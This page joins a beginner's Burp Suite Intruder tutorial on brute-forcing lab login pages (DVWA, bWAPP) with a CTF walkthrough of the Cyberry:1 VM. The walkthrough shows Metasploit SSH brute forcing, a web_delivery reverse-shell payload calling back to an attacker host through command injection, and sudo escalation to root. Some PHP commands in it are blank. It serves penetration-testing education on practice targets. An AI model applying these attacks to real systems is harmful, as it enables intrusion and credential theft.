Beginners Guide to Burpsuite Payloads (Part 1)

Hello friends!! Today we are discussing about the “Types of Payload in Burp Suite”. Burp Suite is an application which is used for testing Web application security. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. This tool is written in JAVA and is developed by PortSwigger Security. We are going to use the Intruder feature of Burp Suite, it is used to brute force web applications. There are 18 types of payloads in intruder i.e.  

·         Simple list

·         Runtime File

·         Case Modification

·         Numbers

·         Brute Forcer

·         Character substitution

·         Custom iterator

·         Recursive grep

·         Illegal Unicode

·         Character blocks

·         Dates

·         Brute Forcer

·         Null Payloads

·         Character frober

·         Bit Flipper

·         Username generator

·         ECB block shuffler

·         Extension Generated

·         Copy other payload

Simple List

This is one of the simple types of payload, as it allows you to configure a short Dictionary of strings which are used as payload.

First, we intercept the request of the login page in the DVWA LAB, where we have given a random username and password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted username and password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame.  

·         Now we will select the fields where we want to attack which is the username and password and click on Add button.

·         Choose the Attack type as Cluster Bomb.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

So now, go to Payloads tab and the select 1 from Payload set (this ‘1’ denotes the first file to be selected). Then click on Load button and select your dictionary file for username.

Now select 2 in the Payload set and again give the dictionary file for the password. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the valid combination of username and password and will give you the correct password and username. The moment it will find the correct value, it will change the value of length as shown.

And to confirm the username and password matched, we will give the matched username and password in the DVWA LAB login page. We will see a message “Welcome to the password protected area admin” which shows are success in the simple list payload attack.

Runtime File
This type of payload allows you to configure a file which reads the payload strings at runtime. This type of payload is needed when we require large list of payloads, to avoid holding the entire list in memory. This payload allows you to configure large list of strings which overcomes the simple list payload type.

First, we have intercepted the request of the login page in the DVWA LAB, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload type” as Runtime File and then give the path of dictionary in the “payload options” as /usr/share/wordists/rockyou.txt which is the largest dictionary in Kali Linux. Select Start Attack in the Intruder menu.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Case Modification

This type of payload allows you to configure a list of strings and apply various case modifications to each item on the list. This is useful in password guessing attacks, for generating case variations on dictionary words.

The following case modification rules can be selected:

• No change - The item is used without being modified.
• To lower case - All letters in the item are converted to lower case.
• To upper case - All letters in the item are converted to upper case.
• To Proper name - The first letter in the item is converted to upper case, and the remaining letters are converted to lower case.
• To Proper Name - The first letter in the item is converted to upper case, and the remaining letters are not changed.

For example, if we select all the modification options, then the item "Raj Chandel" will generate the following payloads:

Raj Chandel

raj chandel

RAJ CHANDEL

Raj chandel

First, we intercept the request of the login page in the DVWA LAB, where we have given a random username and a random password. Then click on login , the burp suite will capture the request of the login page in the intercept tab. Send the captured request to the Intruder by right clicking on the space and selecting Send to Intruder option or simply press ctrl + i.

Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload” type as Case Modification, we have selected the No change and to lower case fields in the “payload options” of the case modification as shown in the image. We have added a default Password dictionary from the Add from list field in the payload options. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Numbers

This type of payload generates numeric payloads within a given range and in a specified format.

The following options are available in this payload:

• Number range:

·         Type - the type options describes that the numbers should be generated sequentially or randomly.

·         From - If numbers are being generated sequentially, this is the value of the first number that will be generated.

·         To - If numbers are being generated sequentially, this value of the last number that will be generated. It is said as the highest possible number that may be randomly generated.

·         Step - the step option is used when numbers are being generated sequentially and specifies the increment in the successive numbers.

·         How many - This option is available when numbers are being generated randomly, and specifies the number of payloads that will be generated

First, we intercept the request of the login page in the Bwapp Lab, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request to the Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as Numbers where we have set the number range from 100 to 150 and we have set the step as 1 as shown in the image, select Start Attack in the Intruder menu.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

As the password matches with a number which is between the given number range. And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack.

Brute Forcer

This type of payload generates a payload of specified lengths that contain all permutations of list of characters in the given string.

The following options are available:

• Character set - The set of characters to be used in the payloads. Note that the total number of payloads increases exponentially with the size of this set.
• Min length - The length of the shortest payload.

·         Max length - The length of the longest payload.

First, we intercept the request of the login page in the Bwapp LAB, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request to the Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

·         In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload type” as Brute Forcer where we can give any kind of input into the “character

set” as shown in the figure , as we have given 213 and we have set the Min length as 3 and Max length as

3 as shown in the image. We can manually give the Min length and Max length as per your need. Select 

Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Great!! We have used Top 5 payloads of Burpsuite for login page brute force attack successfully.

Note: In this articles (part-1) we will be performing top 5 payload types and the rest of the payload types will be discussed in the (part-2) of this article.

Hack the VM Cyberry:1(Boot2root Challenge)

Hello friends! Today we are going to take another CTF challenge known as Cyberry: 1. the credit for making this vm machine goes to “Cyberry” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.18 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sT 192.168.0.18

Nmap scan shows us port 80 is open, so we open ip address in our browser.

We don’t find anything on the webpage we use nikto to find more information.

nikto -h http://192.168.0.18

Nikto scan shows us the login page. We open http://192.168.0.18/login.php on the browser.

We don’t find anything on the login page but a link to the main site http://192.168.0.18/berrypedia.html.

While going through the links on the page. I found an image called placeho1der.jpg

We convert it from negative image into normal image. And we find it was a picture of 4 artists Smiley Lewis, Dave Edmunds, Fats Domino and Gale Storm.

On further research I found that they all sang the same song “I hear you knocking”. From the name of the song and the port image, I concluded it had something to do with port knocking. So I used the release date of the song as the port.

knock 192.168.0.18 1970 1955 1955 1961

After port knocking we did a nmap scan to check if any port is open and we find that port 61955 opened after port knocking

nmap -p- 192.168.0.18

We try netcat but are showed nothing so we open it in our browser; we find that it is running the same website on a different port.

We use dirb to check if there are any different directories on this port.

dirb http://192.168.0.18:61955

We find a new directory http://192.168.0.18:61955/H, we open it and find brain-fuck encoded strings.

We use an online tool to decode the string 1 by 1 and we found a list of username and password. We save the username in one text file and the password in another.

Now we try to brute force ssh using these credentials. We use metasploit to brute force ssh.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.0.18

msf auxiliary(ssh_login) > set user_file /root/user.txt

msf auxiliary(ssh_login) > set pass_file /root/pass.txt

msf auxiliary(ssh_login) > run

We find that the username is mary and password is bakeoff, but we cannot connect through ssh using these credentials. So we use these to login through ftp.

ftp 192.168.0.18

After login through ftp we go inside .bash_history directory there we find 2 files.

We download it into our system and rename them.

get .reminder.enc /root/reminder

get .trash /root/trash

We check the file type and find that reminder is encrypted and trash contains password to decrypt it.

file reminder

file trash

cat trash

Now we use openssl to decrypt it. We create shell code to decrypt it as there are multiple passwords to be used and multiple types of encryption. We save it in files with name decrypted{encryption}{password}.

for i in ‘openssl enc -ciphers | tail -n +2’ ; do for j in ‘cat trash’; do openssl ${i:1} -d -salt -md md5 -in reminder -out “decrypted$i$j” -k $j; done;done 2>/dev/null

Now we check the decrypted files which contain ascii text.

file * | grep ASCII

We open the file that contains ASCII text and find it contains a password.

We use this password to login at http://192.168.0.18:61955/login.php. We use the username we used earlier to brute force ssh and find the username to be mary.

Now once we login we find a link to page.

When we open the link we find a page that does DNS lookup, it looks like it may be vulnerable to command injection.

Now we metasploit to exploit command injection using web_delivery.

msf > use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 192.168.0.12

msf exploit(multi/script/web_delivery) > set lport 4444

msf exploit(multi/script/web_delivery) > run

We use burpsuite to capture the request and execute the command given by metasploit to execute our shell.

As soon as we execute the command we get our reverse shell.

Now we use generate a python tty shell.

python -c “import pty; pty.spawn(‘/bin/bash’)”

we find a few files when we open nb-latin we find it contains a few password.

We download the ‘nb-latin’ file to use it to bruteforce ssh using the username we found earlier.

We use metasploit to bruteforce ssh using the new password file we found.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.18

msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt

msf auxiliary(scanner/ssh/ssh_login) > set pass_file nb-latin

msf auxiliary(scanner/ssh/ssh_login) > run

We find the password to be custodio for nick. Now once we login through ssh we check the sudoers list and there are 2 files we can a user terry.

When we run invoke.sh we find it asks for program as arguments. So we try to run /bin/bash along with the shell script.

sudo -u terry /home/nick/invoke.sh /bin/bash

Now we are login as terry, we again check the sudoers list. We find that we can run awk as user halle. So we spawn a shell using awk as user halle.

sudo -u halle awk ‘BEGIN {system(“/bin/bash -I”)}’

As soon as we spawn a shell we login as halle. We again check sudoers list and find we can run php as user chuck. When we spawn a tty shell using chuck it crashes. So we create a php file to enumerate directories. We find a directory called .deleted/

echo ” > /tmp/shell.php

sudo -u chuck php /tmp/shell.php

When we go inside .deleted folder we find a file deleted.

echo ” > /tmp/shell.php

sudo -u chuck php /tmp/shell.php

Now we create a php file to open the file called deleted.

echo ” > /tmp/shell.php

sudo -u chuck php /tmp/shell.php

Once we open the file we get a hint to create a password in which ‘e’ is used thrice, [c,r,b,a] are used twice and [h,w,m,y] are used once that makes the password 15 characters long. Also the password starts with che and ends with rry and contains baca in between.

We use crunch to create dictionaries with che at start and rry at end with baca at different positions.

We then merge the all dictionaries into one using dymerge.

We add root to the dictionary we used first to brute-force ssh.

Now we use metasploit to bruteforce ssh using the the new dictionaries.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.18

msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt

msf auxiliary(scanner/ssh/ssh_login) > set pass_file password.txt

msf auxiliary(scanner/ssh/ssh_login) > run

Now we find the username as ‘root’ and password to be ‘chewbacabemerry’. Now we take the session and we are login as root.